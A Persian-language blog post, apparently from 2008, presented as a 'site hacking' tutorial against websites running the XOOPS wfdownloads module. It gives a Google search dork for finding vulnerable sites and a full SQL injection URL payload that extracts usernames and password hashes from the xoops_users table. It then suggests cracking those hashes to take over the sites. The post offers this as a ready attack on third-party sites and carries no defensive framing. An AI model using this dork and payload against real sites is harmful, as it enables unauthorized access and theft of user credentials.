[ بستن ]

سیستم وبلاگ پارسی باکسسیستم مدیریت فروش هاست و دامینسایت شخصی محسن داوری برنامه نویس PHPهماهنگی با موتورهای جستجو , رنکینگ گوگل , google pagerank , page rank , seo , search

  جهان اطلاعات  
     
 
منوی اصلی

بخش ها

نویسندگان

آمار
بازدید امروز : 93
بازدید دیروز : 58 ‍
بازدید این ماه : 1497
بازدید امسال : 17706
بازدید کل : 24749


 
سخن روز


آموزش هک سایت های module wfdownloads SQL Injection

 

امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو براتون گذاشتم!
این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای  مدیریت محتوای module wfdownloads SQL Injection هستند به هک آنها بپردازید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

modules/wfdownloads/viewcat.php?cid

یا

modules/wfdownloads

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

modules/wfdownloads/viewcat.php?cid=999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+000,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*where%20pass

حال مشاهده خواهید کرد که یورز نیم و پسورد کاربران سایت مورد نظر را به صورت اینکود شده برای شما نمایش داده می شود که شما می توانید با باز کردن این پسورد از اینکود  پسورد سایت را به دست آورید!

نقل قول از پسورد 35


آموزش هک سايت,هک سايت های module wfdownloads SQL Injection

نوشته شده توسط علیرضا   | نظرات [0] | لینک به این مطلب | | Bookmark and Share


لیست صفحات :: 1

 
لینک ها


--------------------
AddThis Feed Button


--------------------
 
Copy Right 2008 Worldit. ParsiBox.com ( Designed By Alireza Master Design )